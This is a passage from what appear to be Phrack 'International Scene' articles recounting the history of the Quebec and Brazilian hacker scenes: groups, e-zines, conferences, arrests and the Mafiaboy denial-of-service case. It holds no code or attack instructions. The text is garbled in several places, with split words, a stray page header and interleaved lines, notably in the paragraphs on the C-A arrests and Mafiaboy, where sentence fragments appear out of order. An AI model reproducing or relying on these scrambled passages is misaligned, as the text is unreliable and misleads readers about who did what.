scenes" article in Phrack 44. NPC has released a bunch of good quality 
ezines back in 1992 to 1994 about phreaking, hacking and anarchy. 
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Active around 1994 to 1997, the second big hacking and phreaking group was 
C-A (Corruption Addicts). This group was pretty active back then and they 
had the reputation to do some blackhat activities. They have hacked high 

profile organizations, such as the GRC, FBI, SCRS, DND and 11 banks, like 

the National Bank of Canada. 


After C-A dissolved, two other groups took the lead of the Quebec scen 
around 1995, Total Control and FrHack. Both published a couple of ezines. 
Then, around 1998, these groups left the scene, and at the same time they 
made room for Pyrofreak and IGA. 


In 2000, there was the reborn of sector_x. The goal of this group was to 
bring the best hackers that the province of Quebec had to offer under the 


same roof. The idea was great, but ultimately, it failed. There were a 
lot of really good conversations and interesting exchanges between people, 
but there were no concrete and constructive projects at all. In fact, this 


was always one of the major problem of the Quebec scen 


Today, the Quebec scene still exists even tough it has changed a lot during 
the last years. The rapid growth of the Internet has made meeting people a 
lot easier than before, and it helped the community to grow larger. 
Consequently, a lot of people , such as computer geeks, adepts of 
technology, gamers and web programmers began to hang around hacker groups. 
As of today, there is still a couple of hackers left in the dark corners of 
the Quebec scene, but you need to scratch the surface a little bit to find 
them 


Mindkind is one of the only hacking group that still releases ezines on a 
regular basis. They have their own particular style of writing, that could 
be defined as eccentric and delirious. To date, they have published 10 
ezines, talking about different subjects such as phreaking, hacking and 
philosophy. Through the years, many people joined this group and a lot 
have left also, but there is still the same group of fanatics that remains 
to keep the group alive. 


The new millennium has also brought a lot of meetings, conventions and get 
together. Among those events, there were the Hackfests, organized by the 
Centinel. Hackfests are conventions on hacking that last a full weekend 
and they are hosted at University Laval, in Quebec city. A few dozens of 
hackers meet during this time to hack, learn and of course party. On the 
schedule, there are various activities, such as hacking contests, 
conferences and wargames, with a nice music ambiance provided by the 
31337radio internet talk show. 


The 2600 group has also its meetings in Montreal. Each first Friday of 
every month, a small group of computer freaks meet downtown Montreal to 
talk about different subjects such as computers and electronics. Among 
t 
a 


hose conversations, you can sometimes ear some interesting discussions 
bout computer security. 


There is also the famous revers ngineering conference better known as 
Recon that takes place in Montreal. This event is organized by three 
Quebecers, passionate about revers ngineering and security. This 
conference had a lot of good and highly skilled speakers in the past. The 
next conference is planned for the year of 2008. 


Finally, since a couple of years, the corporate world has changed a lot of 
things in the Quebec scene. Now, some hackers are getting paid to do what 
they love to do. Consequently, this movement altered the motivation of a 
lot of hackers over time. I still think it’s possible to stay true to your 
roots even if you earn your living this way, but too many people are 
getting corrupted by the money. Also, a lot of opportunists, with 
absolutely no knowledge of hacking and security, are attracted by the easy 
money you can do in the corporate world of the security, but this is 


17.txt Wed Apr 26 09:43:45 2017 5 


another story 


To my knowledge, one of the first bust to happen in Quebec was back in 
April 1993. Coaxial Karma, from NPC, was arrested for hacking into a 
VAX/VMS cluster of University Laval. He did his prowess by brute forcing 


usernames and passwords. Then, 


an administrator saw the logs by chance, 


and called the police. Since he was a juvenile at that time, he got by 


quite easily. 


June 8th 1998, three members of 


C-A got arrested. They got charged with 


possession of password lists, possession of bomb recipes and hacking. Two 
people got away with it, but phaust, the founder of the group, was 


sentenced to 12 months of commu 
months. 


Back in February 2000, one of t 
happened. I don’t think it’s a 


nity service and placed on probation for 12 


he most publicized denial of service attack 
n exploit that the Quebec scene needs to 


remember, but it’s still something important that needs to be talked about. 


Mafiaboy was the individual who 
against high profile corporatio 
CNN. After bragging about it o 
authorities. In September 2001 
custody, one year of probation, 
fine. 


performed those denial of services attacks 
ns such as Yahoo, Amazon, Dell, eBay and 

n IRC, he got the attention of the 

, he was sentenced to eight months of open 
restricted use of Internet and a small 


PHRACK INTERNATIONAL SCENE ON BRAZIL 


by sandimas 


Since last ’Phrack International Scene on Brazil’, over than a 
decade ago, there were lots of changes on the hacking subject 

in ‘coconut land’. Here is a very brief historical retrospective 
on the evolution of brazilian hacker scene. 


[ -- The initial mark 


Back on that time Internet access in Brazil was somewhat restrict 
only to academicists or rich people. The BBS scene was quite popular 
and still existed. The very begining of the scene was developed on 
this environment, although there is a few information and 


documentation about this time. 


In 1995 when Embratel (our AT&T 


) authorized commercial access 


to the net, there was the kickstart of an rehearsal to a more robust 


hacker scene. In this same year 


the first brazilian hacking e-zine 


called Barata Eletrica appeared, although being lame it can be 
considered the real initial mark of the scene in Brazil. 


[ -- Heading to a more robust scene 


In subsequent years, due to lower prices of equipments, there was 
a significant expansion of hacking in the country. Many people and 


groups got united altogheter to 


exchange knowledge and spread it 


through many e-zines. Although not all publications were that good 


and hackers were not that skill 
the road to an even large scene 
brazilian hacking has ever seen 


d, these people helped out to pave 
. It was the most active time 


[ -- 1999: The rise of the script—-kiddies 


At the end of 90’s hacking achieved a "pop" status in Brazil. Being 
a hacker was "cool". Without much knowledge you could brag and boast 
to your friends and impress chicks. With half-dozen public exploits 
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you could break into computers belonging to the government and other 
high-profile targets. The (always) uniformed media gave so much 
attention to these /’hackers’ and because of this it was easy to have 
your nickname on the most-watched tv news or major newspapers and 
magazines. 


This banalization drawed attetion of the authorities and anti-hacking 
laws were built but they never got through. And, going with the flow, 
many computer security firms were created. Some kids who had grown up 
from the early underground scene went corporate and created their own 
companies. But also there are many other companies that took advantage 
of the fear spread by the media and increased their stock market shares 
by selling lies and offering snake-oil consultancy. 


Needless to say in this Dark Ages few or none worthwhile knowledge was 
produced and published to the national scene. 


[ -- ...and everything after 


Just like after the Dark Ages, we also had our Ages of Englightment, 
shedding a light at the brazilian scene. New groups and a bunch of new 
people and mailing lists committed themselves to study and experiment 
new horizons of computing were formed, quite good papers and tutorials 
in portuguese were published and a scene seemed to be flourishing again, 
even with strange highs and strange lows. 


After a few years of almost nothing interesting occurring here we had 
Hackers 2 Hackers Conference I in 2004, the very first hacker conference 
held in Brazil. H2HC is now moving toward its fourth edition and getting 
better every year. 


Currently in Brazil we have two or three well known teams and a bunch of 
skilled people getting along in close-knit circles. We also have two active 
e-zines, MOTD Guide, aimed to beginners, and The Bug! Magazine, with more 
sophisticated articles and oriented to people with medium level skills. 


[ -- Few words about phone phreaking in coconut land 


There is no phreaking in Brazil. Period. In late 90’s we had only two 
serious groups, a few hangers-on who used to blue box, a guy called Tom 
Waits and a magazine called Brazilian Phreakers Journal dedicated to 
phone phreaking but they are dead and gone now. 


Apart from some tricks to make free phone calls and calling card abuse, 
there seems to be no real phreaking here. Our phone system has been kept 
secret for many years and no one really understands it deeply. 


